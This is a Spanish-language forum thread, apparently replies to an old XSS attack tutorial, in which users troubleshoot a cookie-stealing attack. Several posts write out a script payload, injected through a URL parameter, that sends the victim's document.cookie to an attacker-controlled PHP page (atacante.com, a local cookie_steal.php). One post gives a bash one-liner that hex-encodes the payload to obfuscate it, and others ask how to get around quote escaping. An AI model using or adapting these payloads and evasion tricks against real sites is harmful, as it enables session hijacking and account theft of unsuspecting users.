[::Tutorial::] - Ataques XSS

Iniciado por Rentero, 24 Mayo 2004, 03:49 AM

0 Miembros y 2 Visitantes están viendo este tema.

jdc

Lo más recomendable es guardar en hosting a travez de php, aunque junto con guardarla podrías mandarla al mismo tiempo con php a tú correo :) siempre con php, no creo que javascript tenga funciones para enviar correos ya que se ejecuta de lado del cliente

FL4M4-D0R4D4

Hola amigo intente ponerlo el primero codigo (<script>alert()</script>) y al momento y me salio esto la pagina es www.z8games.com

no se si es algo malo o bueno ( Soy novato)

jdc

Eso es porque el programador dejo mostrando los errores, no significa que sea vulnerable por si misma.

Danielyyo

Hola a todos,

 El caso es que ando probando esta forma de ataque XSS con una aplicación vulnerable, y otra aplicación malintencionada, ambas creadas y alojadas por mi, y no consigo hacerlo funcionar. El codigo de la aplicacion malintencionada es exactamente el propuesto aqui para copiar la cookie a "archivo.txt" y la "url maligna" queda del siguiente modo:
http://80.34.108.239/hackw20/application/user_management/login.php?msg=<script>window.location='http://127.0.0.1/evil/application/cookie_steal.php?cookie='+document.cookie;</script>;

El caso es que al ver posteriormente el codigo fuente de la pagina, parece que en navegador (probado en opera y en chrome) inserta caracteres de escape para las comillas simples, es decir ' -> \' con lo que parece que los navegadores ya proporcionan proteccion contra este tipo de ataque. He probado a cambiar desde la ? a hexadecimal.., a cambiar las comillas simples por dobles, y nada. Unicamente al cambiar las simples por graves ' -> ` parece que el navegador no las toca, pero tampoco funciona. ¿Alguna idea de si este comportamiento es asi, o estoy haciendo algo mal? En caso de que sea asi ¿como lo engañamos? Gracias.

Saludos!

jilipum

Eh hola a todos que hay de nuevo pipol , ultimamente pasaba bastante por aquí aparte de por otros  sitios similiares... y nada que com ultimamte estoy muy desocupado y motivado ,y aparte de esta pregunta, que ha quedao abierta al publico ....

pues haber si se pasa alguién de buen rollo y aclara el ultimo mensaje de danielyyo...
lo pido porfavor es que se me ace un poco duro estar leiendo tó el post y quedarme con dudas en el ultimo sms...   

no me quejo de nada esto se que es en todos los sitios lo que me pongo a buscar cosas del metasploit por ejemplo y acavo leiendo estas cosas que aunque se aprende mucho y puedan servir de gran utilidad, me desvian demasiado...

¿aún funciona con algo esta teknika o ya está parcheada ? y si ya esta parcheada, me pregunto también, ¿si no hay forma de dar permisos como a los firewalls o modificar antes algo en el host/ip victima por ejemplo mediante una shell u argo?



pelonms7

Saludos,

Estuve intentando el tutorial y me parece genial, lo malo es que no se estan guardando las cookies en el archivo txt, revisando una y otra ves el tutorial vi que en la ultima parte tiene el boton buscar (&buscar) para que se pueda ejecutar, yo NO lo estoy haciendo en el campo de busqueda lo estoy haciendo directamente en el URL, y vi que decia que necesita del boton buscar para que se pueda ejecutar, en este caso que no hay boton buscar como se hace para ejecutarlo

asi deberia quedar
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

asi se ve el mio
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>

como puedo hacer para que se ejecute? Saludos
Costa Rica WOW!!!!

ERA

Muy bueno el esfuerzo para la explicación!  ;-)

Me dieron ganas de colaborar!

Para ofuscar la URL

Crean el archivo ./toHexUrl.sh o como les plasca el nombre y le ponen dentro:

#!/bin/bash
echo $1 | hexdump -ve '/1 " %02X"'|sed s/' '/%/g;

Lo usan así:

./toHexUrl.sh  "<script>alert('pepe');</script>"

Produce:

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%70%65%70%65%27%29%3B%3C%2F%73%63%72%69%70%74%3E%0A


Sino, pueden hacer así:

printf "<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>"|hexdump -ve '/1 " %02X"'|sed s/' '/%/g;

%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E


:silbar: ::)

ERA

ufff, lo siento si alguien dijo antes lo que yo, no vi que habia 6 hojas, mala mia!, me quede en la primera  :-[